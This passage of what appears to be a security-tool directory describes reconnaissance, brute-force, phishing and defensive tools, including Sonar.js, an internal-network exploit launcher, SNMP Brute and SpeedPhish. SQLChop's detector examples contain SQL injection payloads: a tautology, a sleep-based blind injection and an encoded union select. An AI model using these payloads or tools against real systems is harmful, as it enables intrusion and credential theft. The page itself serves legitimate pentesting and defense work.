    /NoCapDriver   Starts SniffPass without loading the WinPcap Capture Driver.
    /NoReg         Starts SniffPass without loading/saving your settings to the Registry.


    Download SniffPass

    Snitch - Information Gathering via dorks


    Snitch is a tool that automates the dorking process for a specified domain. Using built-in dork categories, it helps gather information about a domain that can be found using search engines. It can be quite useful in the early phases of a pentest.

    Examples

    devil@hell:~/snitch/$ python snitch.py
    
                           _ __       __  
               _________  (_) /______/ /_ 
              / ___/ __ \/ / __/ ___/ __ \ 
             (__  ) / / / / /_/ /__/ / / /
            /____/_/ /_/_/\__/\___/_/ /_/ ~0.2   
    
    Usage: snitch.py [options]
    
    Options:
      -h, --help            show this help message and exit
      -U [url], --url=[url]
                            domain(s) or domain extension(s) separated by comma *
      -D [type], --dork=[type]
                            dork type(s) separated by comma *
      -O [file], --output=[file]
                            output file
      -S [ip:port], --socks=[ip:port]
                            socks5 proxy
      -I [seconds], --interval=[seconds]
                            interval between requests, 2s by default
      -P [pages], --pages=[pages]
                            pages to retrieve, 10 by default
      -v                    turn on verbosity
    
    Dork types:
      info  | Information leak & Potential web bugs
      ext   | Sensitive extensions
      docs  | Documents & Messages
      files | Files & Directories
      soft  | Web software
      all   | All
    
    Examples:
      snitch.py -I5 -P3 --dork=ext,info -U gov -S 127.0.0.1:9050
      snitch.py --url=site.com -D all -O /tmp/dorks
    
    

    devil@hell:~/snitch/$ python snitch.py -U gov -D ext -P20 -S 127.0.0.1:9050
    [+] Target: gov
    [!] Using SOCKS5 (IP - XX.XX.XX.XX)
    [!] Pages limit set to 20
    
    [+] Looking for sensitive extensions
    
    
    [+] Done!
    
    


    Download Snitch

    SNMP Brute - Fast SNMP brute force, enumeration, CISCO config downloader and password cracking script

    SNMP brute force, enumeration, CISCO config downloader and password cracking script. Listens for any responses to the brute force community strings, effectively minimising wait time.

    Requirements
    • metasploit
    • snmpwalk
    • snmpstat
    • john the ripper

    Usage
    python snmp-brute.py -t [IP]


    Options
    --help, -h show this help message and exit
    --file=DICTIONARY, -f DICTIONARY Dictionary file
    --target=IP, -t IP Host IP
    --port=PORT, -p PORT SNMP port


    Advanced
    --rate=RATE, -r RATE Send rate
    --timeout=TIMEOUT Wait time for UDP response (in seconds)
    --delay=DELAY Wait time after all packets are send (in seconds)
    --iplist=LFILE IP list file
    --verbose, -v Verbose output


    Automation
    --bruteonly, -b Do not try to enumerate - only bruteforce
    --auto, -a Non Interactive Mode
    --no-colours No colour output


    Operating Systems
    --windows Enumerate Windows OIDs (snmpenum.pl)
    --linux Enumerate Linux OIDs (snmpenum.pl)
    --cisco Append extra Cisco OIDs (snmpenum.pl)


    Alternative Options
    --stdin, -s Read communities from stdin
    --community=COMMUNITY, -c COMMUNITY Single Community String to use
    --sploitego Sploitego's bruteforce method


    Features
    • Brute forces both version 1 and version 2c SNMP community strings
    • Enumerates information for CISCO devices or if specified for Linux and Windows operating systems.
    • Identifies RW community strings
    • Tries to download the router config (metasploit module).
    • If the CISCO config file is downloaded, shows the plaintext passwords (metasploit module) and tries to crack hashed passwords with John the Ripper


    Download SNMP Brute

    Socat - Multipurpose relay (SOcket CAT)

    Socat is a utility similar to the venerable Netcat that works over a number of protocols and through files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.

    Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many different purposes.

    Filan is a utility that prints information about its active file descriptors to stdout. It has been written for debugging socat, but might be useful for other purposes too. Use the -h option to find more information.

    Procan is a utility that prints information about process parameters to stdout. It has been written to better understand some UNIX process properties and for debugging socat, but might be useful for other purposes too.

    The life cycle of a socat instance typically consists of four phases.

    In the init phase, the command line options are parsed and logging is initialized.

    During the open phase, socat opens the first address and afterwards the second address. These steps are usually blocking; thus, especially for complex address types like socks, connection requests or authentication dialogs must be completed before the next step is started.

    In the transfer phase, socat watches both streams' read and write file descriptors via select(), and, when data is available on one side and can be written to the other side, socat reads it, performs newline character conversions if required, and writes the data to the write file descriptor of the other stream, then continues waiting for more data in both directions.

    When one of the streams effectively reaches EOF, the closing phase begins. Socat transfers the EOF condition to the other stream, i.e. tries to shutdown only its write stream, giving it a chance to terminate gracefully. For a defined time socat continues to transfer data in the other direction, but then closes all remaining channels and terminates.
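    The transfer and closing phases described above, as an added Python model (example code written for this page, not socat's own): relay() selects on both streams, half-closes the other side when one reaches EOF and keeps the reverse direction open for a -t style timeout; demo() drives it over two constructed socketpairs that stand in for socat's two addresses.

```python
import select
import socket
import threading
import time


def relay(left, right, close_timeout=0.5, bufsize=8192):
    """Transfer and closing phases of a two-stream relay, modelled on the
    socat life cycle described above (not socat's implementation).

    Transfer phase: select() on both streams' read sides; whatever arrives
    on one side is written to the other, at most bufsize bytes per step.
    Closing phase: when one stream reaches EOF, only the *write* side of
    the other stream is shut down; data keeps flowing in the opposite
    direction for close_timeout seconds (the role of socat's -t), or until
    that stream reaches EOF as well. Returns bytes read from (left, right).
    """
    peer = {left: right, right: left}
    readable_sides = {left, right}
    moved = {left: 0, right: 0}            # bytes read from each side
    deadline = None                        # set when the closing phase starts
    while readable_sides:
        wait = None if deadline is None else max(0.0, deadline - time.monotonic())
        ready, _, _ = select.select(list(readable_sides), [], [], wait)
        if not ready:
            break                          # closing timeout elapsed, give up
        for s in ready:
            data = s.recv(bufsize)
            if data:
                peer[s].sendall(data)
                moved[s] += len(data)
                continue
            # EOF on s: pass it on by half-closing the other stream only
            readable_sides.discard(s)
            try:
                peer[s].shutdown(socket.SHUT_WR)
            except OSError:
                pass
            if deadline is None:
                deadline = time.monotonic() + close_timeout
    for s in (left, right):
        s.close()
    return moved[left], moved[right]


def demo(close_timeout=2.0):
    """Constructed scenario: c1/c2 play the two remote ends, r1/r2 are the
    relay's streams. Returns what each end observed."""
    c1, r1 = socket.socketpair()
    c2, r2 = socket.socketpair()
    outcome = {}
    worker = threading.Thread(
        target=lambda: outcome.update(moved=relay(r1, r2, close_timeout)))
    worker.start()
    try:
        c1.sendall(b"hello")
        outcome["at_c2"] = c2.recv(1024)        # forwarded left -> right
        c2.sendall(b"world")
        outcome["at_c1"] = c1.recv(1024)        # forwarded right -> left
        c1.shutdown(socket.SHUT_WR)             # EOF on the left stream
        outcome["eof_at_c2"] = c2.recv(1024)    # b"": relay half-closed right
        c2.sendall(b"late")                     # right -> left still flows
        outcome["late_at_c1"] = c1.recv(1024)
        c2.shutdown(socket.SHUT_WR)             # second EOF: relay terminates
        worker.join(timeout=10)
        outcome["finished"] = not worker.is_alive()
    finally:
        c1.close()
        c2.close()
    return outcome


if __name__ == "__main__":
    print(demo())
```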

    OPTIONS

    Socat provides some command line options that modify the behaviour of the program. They have nothing to do with so called address options that are used as parts of address specifications.

    -V
    Print version and available feature information to stdout, and exit.
    -h | -?
    Print a help text to stdout describing command line options and available address types, and exit.
    -hh | -??
    Like -h, plus a list of the short names of all available address options. Some options are platform dependent, so this output is helpful for checking the particular implementation.
    -hhh | -???
    Like -hh, plus a list of all available address option names.
    -d
    Without this option, only fatal and error messages are generated; applying this option also prints warning messages. See DIAGNOSTICS for more information.
    -d -d
    Prints fatal, error, warning, and notice messages.
    -d -d -d
    Prints fatal, error, warning, notice, and info messages.
    -d -d -d -d
    Prints fatal, error, warning, notice, info, and debug messages.
    -D
    Logs information about file descriptors before starting the transfer phase.
    -ly[<facility>]
    Writes messages to syslog instead of stderr; severity as defined with -d option. With optional <facility>, the syslog type can be selected, default is "daemon". Third party libraries might not obey this option.
    -lf <logfile>
    Writes messages to <logfile> [filename] instead of stderr. Some third party libraries, in particular libwrap, might not obey this option.
    -ls
    Writes messages to stderr (this is the default). Some third party libraries might not obey this option, in particular libwrap appears to only log to syslog.
    -lp<progname>
    Overrides the program name printed in error messages and used for constructing environment variable names.
    -lu
    Extends the timestamp of error messages to microsecond resolution. Does not work when logging to syslog.
    -lm[<facility>]
    Mixed log mode. During startup messages are printed to stderr; when socat starts the transfer phase loop or daemon mode (i.e. after opening all streams and before starting data transfer, or, with listening sockets with fork option, before the first accept call), it switches logging to syslog. With optional <facility>, the syslog type can be selected, default is "daemon".
    -lh
    Adds hostname to log messages. Uses the value from environment variable HOSTNAME or the value retrieved with uname() if HOSTNAME is not set.
    -v
    Writes the transferred data not only to their target streams, but also to stderr. The output format is text with some conversions for readability, and prefixed with "> " or "< " indicating flow directions.
    -x
    Writes the transferred data not only to their target streams, but also to stderr. The output format is hexadecimal, prefixed with "> " or "< " indicating flow directions. Can be combined with -v .
    -b<size>
    Sets the data transfer block <size> [size_t]. At most <size> bytes are transferred per step. Default is 8192 bytes.
    -s
    By default, socat terminates when an error occurred to prevent the process from running when some option could not be applied. With this option, socat is sloppy with errors and tries to continue. Even with this option, socat will exit on fatals, and will abort connection attempts when security checks failed.
    -t<timeout>
    When one channel has reached EOF, the write part of the other channel is shut down. Then, socat waits <timeout> [timeval] seconds before terminating. Default is 0.5 seconds. This timeout only applies to addresses where write and read part can be closed independently. When during the timeout interval the read part gives EOF, socat terminates without awaiting the timeout.
    -T<timeout>
    Total inactivity timeout: when socat is already in the transfer loop and nothing has happened for <timeout> [timeval] seconds (no data arrived, no interrupt occurred...) then it terminates. Useful with protocols like UDP that cannot transfer EOF.
    -u
    Uses unidirectional mode. The first address is only used for reading, and the second address is only used for writing (example).
    -U
    Uses unidirectional mode in reverse direction. The first address is only used for writing, and the second address is only used for reading.
    -g
    During address option parsing, don't check if the option is considered useful in the given address environment. Use it if you want to force, e.g., appliance of a socket option to a serial device.
    -L<lockfile>
    If lockfile exists, exits with error. If lockfile does not exist, creates it and continues, unlinks lockfile on exit.
    -W<lockfile>
    If lockfile exists, waits until it disappears. When lockfile does not exist, creates it and continues, unlinks lockfile on exit.
    -4
    Use IP version 4 in case that the addresses do not implicitly or explicitly specify a version; this is the default.
    -6
    Use IP version 6 in case that the addresses do not implicitly or explicitly specify a version. 


    Download Socat

    Softavir - Antivirus for Windows based on Whitelists


    SoftAvir is a security tool that ensures complete protection for your computer by creating a whitelist. The user selects the only programs that may run, which prevents the execution of any other, unwanted program.

    How does it work?

    Softavir is the first antimalware solution whose operation relies on advanced cryptographic whitelisting technology.

    After installation, the user must add the programs that are allowed to run. Softavir will not allow the execution of any program that has not been added to the list (including viruses, trojans and other malware).

    Who is it for?

    Softavir is recommended for Microsoft Windows users. The current version is compatible with Microsoft Windows x86 operating systems; a version for Microsoft Windows x64 operating systems will be released soon.

    Main advantages:

    • 100% protection against new threats.
    • Does not require updates.
    • Improved software management.
    • Easy maintenance of your equipment.
    • Avoids the need of regular formatting.

    Download Softavir

    Sonar.js - Framework for identifying and launching exploits against internal network hosts

    A framework for identifying and launching exploits against internal network hosts. Works via WebRTC IP enumeration, WebSocket host scanning, and external resource fingerprinting.

    How does it work?

    Upon loading the sonar.js payload in a modern web browser the following will happen:
    • sonar.js will use WebRTC to enumerate what internal IPs the user loading the payload has.
    • sonar.js then attempts to find live hosts on the internal network via WebSockets.
    • If a live host is found, sonar.js begins to attempt to fingerprint the host by linking to it via <img src="x"> and <link rel="stylesheet" type="text/css" href="x"> and hooking the onload event. If the expected resources load successfully it will trigger the pre-set JavaScript callback to start the user-supplied exploit.
    • If the user changes networks, sonar.js starts the process all over again on the newly joined network.

    Fingerprints

    sonar.js works off of a database of fingerprints. A fingerprint is simply a list of known resources on a device that can be linked to and detected via onload. Examples of this include images, CSS stylesheets, and even external JavaScript.

    An example fingerprint database can be seen below:
    var fingerprints = [
        {
            'name': "ASUS RT-N66U",
            'fingerprints': ["/images/New_ui/asustitle.png","/images/loading.gif","/images/alertImg.png","/images/New_ui/networkmap/line_one.png","/images/New_ui/networkmap/lock.png","/images/New_ui/networkmap/line_two.png","/index_style.css","/form_style.css","/NM_style.css","/other.css"],
            'callback': function( ip ) {
                // Insert exploit here
            },
        },
        {
            'name': "Linksys WRT54G",
            'fingerprints': ["/UILinksys.gif","/UI_10.gif","/UI_07.gif","/UI_06.gif","/UI_03.gif","/UI_02.gif","/UI_Cisco.gif","/style.css"],
            'callback': function( ip ) {
                // Insert exploit here
            },
        },
    ]
    
    The above database contains fingerprints for two devices, the ASUS RT-N66U WiFi router and the Linksys WRT54G WiFi router.

    Each database entry has the following:
    • name: A field to identify what device the fingerprint is for. This could be something like HP Officejet 4500 printer or Linksys WRT54G Router.
    • fingerprints: This is an array of relative links to resources such as CSS stylesheets, images, or even JavaScript files. If you expect these resources to be on a non-standard port such as 8080, set the resource with the port included: :8080/unique.css. Keep in mind using external resources with active content such as JavaScript is dangerous as it can interrupt the regular flow of execution.
    • callback: If all of these resources are found to exist on the enumerated host then the callback function is called with a single argument of the device's IP address.
    By creating your own fingerprints you can build custom exploits that will be launched against internal devices once they are detected by sonar.js. Common exploits include things such as Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. The idea is that you can use these vulnerabilities to do things such as modifying router DNS configurations, dumping files from an internal fileserver, and more.

    For an easier way to create fingerprints, a Chrome extension is available that generates fingerprint template code automatically for the page you're on.


    What can be done using sonar.js?

    By using sonar.js a pentesting team can build web exploits against things such as internal logging servers, routers, printers, VOIP phones, and more. Because internal networks are often less guarded, attacks such as CSRF and XSS can be powerful for taking over the configuration of devices on a host's internal network.


    Download Sonar.js

    SparkyLinux - Lightweight & fast Debian-based Linux Distribution


    SparkyLinux is a GNU/Linux distribution created on the “testing” branch of Debian. It features customized lightweight desktops (like E19, LXDE and Openbox), multimedia plugins, selected sets of apps and own custom tools to ease different tasks.

    Why Sparky?

    SparkyLinux is a Debian-based Linux distribution which provides a ready-to-use, out-of-the-box operating system with a set of slightly customized lightweight desktops.

    Sparky is aimed at all computer users who want to replace an existing, proprietary OS with an open-source one.

    Sparky is also aimed at two different groups of users:
    • Full Editions – with all the tools, codecs, plugins and drivers preinstalled – for users who want everything ready and working from the first system run
    • Base Editions – with a minimal set of tools – for advanced users who like to set up everything themselves

    Main features of Sparky
    • Debian testing based
    • rolling release
    • lightweight, fast & simple
    • set of desktops to choose: LXDE, Enlightenment, JWM, KDE, LXQt, Openbox, MATE, Xfce
    • ultra light base edition with Openbox or JWM desktops
    • special gaming edition: GameOver
    • CLI Edition (no X) for building customized desktop
    • most wireless and mobile network cards supported
    • set of selected applications, multimedia codecs and plugins
    • own repository with a large set of additional applications
    • easy hard drive / USB installation
    In general, Sparky is not aimed at Linux beginners, but rather at users with some amount of Linux knowledge.

    Anyway, Linux beginners are welcome too – our forum is open for any question.


    Download SparkyLinux

    SPARTA - Network Infrastructure Penetration Testing Tool



    SPARTA is a python GUI application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to his toolkit and by displaying all tool output in a convenient way. If little time is spent setting up commands and tools, more time can be spent focusing on analysing results.

    Features

    – Run nmap from SPARTA or import nmap XML output.
    – Transparent staged nmap: get results quickly and achieve thorough coverage.
    – Configurable context menu for each service. You can configure what to run on discovered services. Any tool that can be run from a terminal, can be run from SPARTA.
    – You can run any script or tool on a service across all the hosts in scope, just with a click of the mouse.
    – Define automated tasks for services (i.e. run nikto on every HTTP service, or sslscan on every SSL service).
    – Default credentials check for most common services. Of course, this can also be configured to run automatically.
    – Identify password reuse on the tested infrastructure. If any usernames/passwords are found by Hydra they are stored in internal wordlists which can then be used on other targets in the same network (breaking news: sysadmins reuse passwords).
    – Ability to mark hosts that you have already worked on so that you don’t waste time looking at them again.
    – Website screenshot taker so that you don’t waste time on less interesting web servers.


    Download SPARTA

    Speedtest - Command Line Interface for Testing Internet Bandwidth


    speedtest-cli is a command line interface for testing internet bandwidth using speedtest.net.

    Installation

    pip / easy_install
    pip install speedtest-cli
    
    or
    easy_install speedtest-cli
    

    Github
    pip install git+https://github.com/sivel/speedtest-cli.git
    
    or
    git clone https://github.com/sivel/speedtest-cli.git
    python speedtest-cli/setup.py install
    

    Just download (Like the way it used to be)
    wget -O speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest_cli.py
    chmod +x speedtest-cli
    
    or
    curl -Lo speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest_cli.py
    chmod +x speedtest-cli
    

    Usage

    $ speedtest-cli -h
    usage: speedtest-cli [-h] [--bytes] [--share] [--simple] [--list]
                         [--server SERVER] [--mini MINI] [--source SOURCE]
                         [--timeout TIMEOUT] [--version]
    
    Command line interface for testing internet bandwidth using speedtest.net.
    --------------------------------------------------------------------------
    https://github.com/sivel/speedtest-cli
    
    optional arguments:
      -h, --help         show this help message and exit
      --bytes            Display values in bytes instead of bits. Does not affect
                         the image generated by --share
      --share            Generate and provide a URL to the speedtest.net share
                         results image
      --simple           Suppress verbose output, only show basic information
      --list             Display a list of speedtest.net servers sorted by
                         distance
      --server SERVER    Specify a server ID to test against
      --mini MINI        URL of the Speedtest Mini server
      --source SOURCE    Source IP address to bind to
      --timeout TIMEOUT  HTTP timeout in seconds. Default 10
      --version          Show the version number and exit
    


    Download Speedtest

    SPF - SpeedPhish Framework


    SPF (SpeedPhish Framework) is a python tool designed to allow for quick recon and deployment of simple social engineering phishing exercises.

    Requirements:
    • dnspython
    • twisted
    • PhantomJS

    Usage:
    usage: spf.py [-h] [-f <list.txt>] [-C <config.txt>] [--all] [--test] [-e]
                  [-g] [-s] [--simulate] [-w] [-W] [-d <domain>]
                  [-c <company's name>] [--ip <IP address>] [-v] [-y]
    
    optional arguments:
      -h, --help           show this help message and exit
      -d <domain>          domain name to phish
      -c <company's name>  name of company to phish
      --ip <IP address>    IP of webserver defaults to [192.168.1.124]
      -v, --verbosity      increase output verbosity
    
    input files:
      -f <list.txt>        file containing list of email addresses
      -C <config.txt>      config file
    
    enable flags:
      --all                enable ALL flags... same as (-e -g -s -w)
      --test               enable all flags EXCEPT sending of emails... same as
                           (-e -g --simulate -w -y -v -v)
      -e                   enable external tool utilization
      -g                   enable automated gathering of email targets
      -s                   enable automated sending of phishing emails to targets
      --simulate           simulate the sending of phishing emails to targets
      -w                   enable generation of phishing web sites
      -W                   leave web server running after termination of spf.py
    
    misc:
      -y                   automatically answer yes to all questions
    
    Execution:
    cd spf
    python spf.py --test -d example.com
    
    or to just test the websites:
    cd spf
    python web.py default.cfg
    

    Misc

    Video of sample usage

    BsidesKnox 2015 video


    Download SpeedPhish Framework

    SpiderFoot v2.6.1 - Open Source Intelligence Automation


    SpiderFoot is an open source intelligence automation tool. Its goal is to automate the process of gathering intelligence about a given target.

    Purpose 

    There are three main areas where SpiderFoot can be useful:
    1. If you are a pen-tester, SpiderFoot will automate the reconnaissance stage of the test, giving you a rich set of data to help you pinpoint areas of focus for the test.
    2. Understand what your network/organisation is openly exposing to the outside world. Such information in the wrong hands could be a significant risk.
    3. SpiderFoot can also be used to gather threat intelligence about suspected malicious IPs you might be seeing in your logs or have obtained via threat intelligence data feeds.

    Features
    • Utilises a shedload of data sources; over 40 so far and counting, including SHODAN, RIPE, Whois, PasteBin, Google, SANS and more.
    • Designed for maximum data extraction; every piece of data is passed on to modules that may be interested, so that they can extract valuable information. No piece of discovered data is exempt from analysis.
    • Runs on Linux and Windows. And fully open-source so you can fork it on GitHub and do whatever you want with it.
    • Visualisations. Built-in JavaScript-based visualisations or export to GEXF/CSV for use in other tools, like Gephi for instance.
    • Web-based UI. No cumbersome CLI or Java to mess with. Easy to use, easy to navigate. Take a look through the gallery for screenshots.
    • Highly configurable. Almost every module is configurable so you can define the level of intrusiveness and functionality.
    • Modular. Each major piece of functionality is a module, written in Python. Feel free to write your own and submit them to be incorporated!
    • SQLite back-end. All scan results are stored in a local SQLite database, so you can play with your data to your heart’s content.
    • Simultaneous scans. Each footprint scan runs as its own thread, so you can perform footprinting of many different targets simultaneously.
    • So much more.. check out the documentation for more information.

    Data Sources
    This is an ever-growing list of data sources SpiderFoot uses to gather intelligence about your target. A few require API keys but they are freely available.
    Source Location Notes
    abuse.ch http://www.abuse.ch Various malware trackers.
    AdBlock https://easylist-downloads.adblockplus.org/easylist.txt AdBlock pattern matches
    AlienVault https://reputation.alienvault.com AlienVault’s IP reputation database.
    Autoshun.org http://www.autoshun.org Blacklists.
    AVG Site Safety Report http://www.avgthreatlabas.com Site safety checker.
    Bing http://www.bing.com Scraping but future version to also use API.
    Blocklist.de http://lists.blocklist.de Blacklists.
    Checkusernames.com http://www.checkusernames.com Look up username availability on popular sites.
    DNS Your configured DNS server. Defaults to your local DNS but can be configured to whatever IP address you supply SpiderFoot.
    DomainTools http://www.domaintools.com
    DroneBL http://www.dronebl.org
    DuckDuckGo http://www.duckduckgo.com
    Facebook http://www.facebook.com Scraping but future version to also use API.
    FreeGeoIP http://freegeoip.net
    Github http://www.github.com
    Google http://www.google.com Scraping but future version to also use API.
    Google+ http://plus.google.com Scraping but future version to also use API.
    Google Safe Browsing http://www.google.com/safebrowsing Site safety checker.
    IPCat https://raw.githubusercontent.com/client9/ipcat/master/datacenters.csv IP Categorisation.
    LinkedIn http://www.linkedin.com Scraping but future version to also use API.
    malc0de.com http://malc0de.com Blacklists.
    malwaredomainlist.com http://www.malwaredomainlist.com Blacklists.
    malwaredomains.com http://www.malwaredomains.com Blacklists.
    McAfee SiteAdvisor http://www.siteadvisor.com Site safety checker.
    NameDroppers http://www.namedroppers.org
    Notepad.cc http://www.notepad.cc
    Nothink.org http://www.nothink.org Blacklists.
    Onion.City http://onion.city Search engine for the dark web.
    OpenBL http://www.openbl.org Blacklists.
    PasteBin http://www.pastebin.com Achieved through Google scraping.
    Pastie http://www.pastie.org
    PGP Servers http://pgp.mit.edu/pks/ PGP public keys.
    PhishTank http://www.phishtank.org Identified phishing sites.
    Project Honeypot http://www.projecthoneypot.org Blacklists. API key needed.
    PunkSPIDER http://www.punkspider.org
    RIPE/ARIN http://stat.ripe.net/
    Robtex http://www.robtex.com
    SANS ISC http://isc.sans.edu Internet Storm Center IP reputation database.
    SHODAN http://www.shodanhq.com API key needed.
    SORBS http://www.sorbs.net Blacklists.
    SpamHaus http://www.spamhaus.org Blacklists.
    ThreatExpert http://www.threatexpert.com Blacklists.
    TOR Node List http://torstatus.blutmagie.de
    TotalHash.com http://www.totalhash.com Domains/IPs used by malware.
    UCEPROTECT http://www.uceprotect.net Blacklists.
    VirusTotal http://www.virustotal.com Domains/IPs used by malware. API key needed.
    WayBack Machine http://www.archive.org
    Whois Various Whois servers for different TLDs.
    XSSposed http://www.xssposed.org
    Yahoo http://www.yahoo.com Scraping but future version to also use API.
    Zone-H http://www.zone-h.org Easy to get black-listed. Log onto the site in a browser from the IP you’re scanning from first and enter the CAPTCHA, then it should be fine.


    Download SpiderFoot v2.6.1

    Sptoolkit Rebirth - Phishing Education Toolkit


    The spt (rebirth) project is an open source phishing education toolkit that aims to help in securing the mind as opposed to securing computers. Organizations spend billions of dollars annually in an effort to safeguard information systems, but spend little to nothing on the under trained and susceptible minds that operate these systems, thus rendering most technical protections instantly ineffective. A simple, targeted link is all it takes to bypass the most advanced security protections. The link is clicked, the deed is done.

    spt was developed from the ground up to provide a simple and easy to use framework to identify your weakest links so that you can patch the human vulnerability. If the spt project sounds interesting to you, please consider downloading it for evaluation in your own organization. Feedback is welcomed and always appreciated.

    INSTALLATION

    The Basics
    1. Create and configure the MySQL database. spt will need a MySQL database to house its data, so go ahead and create that database and configure the associated user account for the new database with ALL PRIVILEGES assigned to it. Be sure you record the database name, user name and password in a safe place, you'll need it soon to install spt!
    2. Ensure you have PHP 5.4
    3. Extract the spt files from the archive.
    4. Create a new directory on your web server, such as "spt" and upload the files to the directory.

    Install spt
    1. Open your web browser and navigate to the location where you uploaded the files and browse to install.php. For example, http://www.myhost.com/spt/install.php. If you accidentally just go to the root of the folder you placed the files in, you will be prompted to start the installation by clicking the right pointing arrow.
    2. When prompted to accept the GNU General Public License, click the "I Agree!" button. For reference, you can read the full text of the license in the license.htm file included in the root of the extracted files.
    3. On the next page, you will get feedback on the readiness of your server to install the spt. You can learn more about any failed items by hovering over the icon. Click the “Proceed!” button if all checks passed, or click the “Proceed Anyways” button if one of the checks failed and you have verified that the spt installer is reporting incorrectly.
    4. On the next page, you will need to provide those database details from earlier. The default server and database ports are provided, be sure to change them if your installation will require something else. Enter in the remaining required information and click the "Install Database!" button to get things moving along.
    5. If all goes well, you will see a listing of tables that have been successfully created. Click "Continue!" to move on.
    6. If instead you see an error indicated, click the "<back" button to go back and enter the database information again.
    7. Now it's time to create your first user, for you! Enter your first and last name, email address and password and click the "Create User" button to continue on.
    8. If you receive any errors, such as for an invalid email address or a password that does not meet the complexity requirements, click the "<back" button and try it again.
    9. Once you enter the required information successfully, you will receive confirmation. Click the "Proceed to Login" button to get logged into the spt!
    10. Now it's time to login using the email address and password you entered in the previous step. See, that was easy!


    Download Sptoolkit Rebirth

    SQLassie - Effective Database Security


    SQLassie is a free MySQL database firewall that prevents SQL injection attacks at runtime. SQLassie uses Bayesian classifiers to determine the likelihood of a query being an attack. This approach produces fewer false positives than other similar approaches.

    Security
    SQLassie prevents injection attacks before they have a chance to run.

    Instantaneous
    Protection is instantaneous - just point your web applications at SQLassie and you're done!

    Analysis
    SQLassie tracks suspicious queries, classifies them based on their intent, and logs this information for further review.

    Options
    SQLassie can be used as a passive intrusion detection system or as an active intrusion prevention system.

    Support
    SQLassie is free and being constantly updated and improved. Have a problem or feature request? Let us know!

    Usage

    SQLassie currently only supports MySQL. To start SQLassie, you'll need to configure how SQLassie connects to the MySQL server, start SQLassie listening on a separate port (which is the protected one), and then configure your applications to connect through this alternate port instead of directly to MySQL.
    As an example, consider a scenario where you have a MySQL database engine running and listening for connections on the domain socket /var/run/mysql/mysqld.sock and are running a MediaWiki installation.

    First, start SQLassie using
    ./sqlassie -s /var/run/mysql/mysqld.sock -l 3307
    Then, edit MediaWiki's configuration file LocalSettings.php to connect to port 3307:
    $wgDBServer = "127.0.0.1:3307";
    

    Note that you can't use localhost here; by default, MySQL interprets localhost as a request to use the direct database domain socket connection, and most web applications behave this way as well. Therefore, you have to use the explicit string 127.0.0.1 in order to force connections to go through the TCP port. Check your application's documentation for more information.


    SQLChop - SQL Injection Detection Engine


    SQLChop is a novel SQL injection detection engine built on top of SQL tokenizing and syntax analysis. Web input (URL path, body, cookie, etc.) is first decoded to the raw payloads that the web app accepts; syntactic analysis is then performed on each payload to classify the result. The algorithm behind SQLChop is based on compiler techniques and automata theory, and runs with a time complexity of O(N).

    Documentation

    http://sqlchop.chaitin.com/doc.html

    Dependencies

    The SQLChop alpha testing release includes the C++ header and shared object, a Python library, and also some sample usages. The release has been tested on most Linux distributions.
    If using python, you need to install protobuf-python, e.g.:
    $ sudo pip install protobuf
    
    If using C++, you need to install protobuf, protobuf-compiler and protobuf-devel, e.g.:
    $ sudo yum install protobuf protobuf-compiler protobuf-devel

    Build

    SQLChop Python API

    The current alpha testing release is provided as a Python library. C++ headers and examples will be released soon.
    The following APIs are the main interfaces SQLChop exports.

    is_sqli

    Given a raw payload, determine whether the payload is an SQL injection payload.
    • Parameter: string
    • Return value: bool, return True for SQLi payload, return False for normal case.
    >>> from sqlchop import SQLChop
    >>> detector = SQLChop()
    >>> detector.is_sqli('SELECT 1 From users')
    True
    >>> detector.is_sqli("' or '1'='1")
    True
    >>> detector.is_sqli('select the best student from classes as the student union representative')
    False
    >>> detector.is_sqli('''(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/''')
    True

    classify

    Given a web application input, the classify API decodes the input and looks for possible SQL injection payloads inside it. If SQLi payloads are found, they are listed.
    • Parameter 1: object with following keys
      1. urlpath: string, the urlpath of web request
      2. body: string, the http body of POST/PUT request
      3. cookie: string, the cookie content of web request
      4. raw: string, other general field that needs general decoding.
    • Parameter 2: detail. If True, a detailed payload list is returned; if False, only the result is returned, which is faster.
    • Return: an object containing result and payloads
      1. result: int, positive value indicates the web request contains sql injection payload
      2. payloads: list of objects containing key, score, value and source
        • key: string, reserved
        • source: string, shows where this payload is embedded in the original web request and how the payload was decoded
        • value: decoded sqli payload
        • score: the score of the decoded sqli payload
    Examples here:
    >>> from sqlchop import SQLChop
    >>> detector = SQLChop()
    >>> detector.classify({'urlpath': '/tag/sr/news.asp?d=LTElMjBhbmQlMjAxPTIlMjB1bmlvbiUyMHNlbGVjdCUyMDEsMiwzLGNocigxMDYpLDUsNiw3LDgsOSwxMCwxMSwxMiUyMGZyb20lMjBhZG1pbg==' }, True)
    {
        'payloads': [{
            'key': '',
            'score': 4.070000171661377,
            'source': 'urlpath: querystring_decode b64decode url_decode ',
            'value': '-1 and 1=2 union select 1,2,3,chr(106),5,6,7,8,9,10,11,12 from admin'
        }],
        'result': 1
    }
    
